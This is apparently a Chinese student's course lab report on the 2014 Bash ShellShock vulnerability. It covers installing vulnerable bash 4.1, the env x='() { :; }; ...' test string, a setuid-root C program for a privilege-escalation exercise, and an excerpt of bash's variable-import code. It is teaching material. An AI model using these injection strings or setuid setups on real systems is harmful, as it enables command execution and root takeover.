2019-2020-1 20199305《Linux内核原理与分析》第十一周作业

ShellShock 攻击实验

（一）何为ShellShock？

2014年9月24日，Bash中发现了一个严重漏洞shellshock，该漏洞可用于许多系统，并且既可以远程也可以在本地触发，这项漏洞的威胁程度之所以堪比“心脏流血”，一定程度上是因为Shellshock所影响的Bash软件，同样被广泛应用与各类网络服务器以及其他电脑设备。要是用一句话概括这个漏洞，就是代码和数据没有正确区分。

（二）实验准备

（1）环境搭建

 sudo su
 wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

(2)安装

 tar xf bash-4.1.tar.gz
 cd bash-4.1
 ./configure
 make && make install

(3)链接

rm /bin/bash
ln -s /usr/local/bin/bash /bin/bash

(4)漏洞检查

exit
env x='() { :; }; echo vulnerable' bash -c "echo this is a test "

（三）实验过程

(1)本实验中，我们通过攻击Set-UID程序来获得root权限。 首先，确保安装了带有漏洞的bash版本，并让/bin/sh 指向/bin/bash，然后在 /home/shiyanlou 目录下新建一个 shock.c 文件。

 sudo ln -sf /bin/bash /bin/sh
 vi shock.c

输入如下内容：

#include <stdio.h>
void main()
{
    setuid(geteuid()); // make real uid = effective uid.
    system("/bin/ls -l");
}

(2)编译这段代码，并设置其为Set-UID程序，保证它的所有者是root

sudo su
gcc -o shock shock.c
chmod u+s shock
ls -il shock

这里使用了setuid(geteuid()) 来使real uid = effective uid，这在Set-UID程序中不是普遍现象，但它确实有时会发生。

如果 setuid(geteuid()) 语句被去掉了，再试试看攻击

失败了！这就说明如果 real uid 和 effective uid 相同的话，定义在环境变量中的内容在该程序内有效，那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话，环境变量失效，就无法发动攻击了

（3）这里给出部分代码

void initialize_shell_variables(){
// 循环遍历所有环境变量
for (string_index = 0; string = env[string_index++]; ) {
     /*...*/
     /* 如果有export过的函数, 在这里定义 */
     /* 无法导入在特权模式下（root下）定义的函数 */
     if (privmode == 0 && read_but_dont_execute == 0 &&
           STREQN (“() {“, string, 4)) {
           [...]
           // 这里是shellshock发生的地方
           // 传递函数定义 + 运行额外的指令
           parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
           [...]
}
}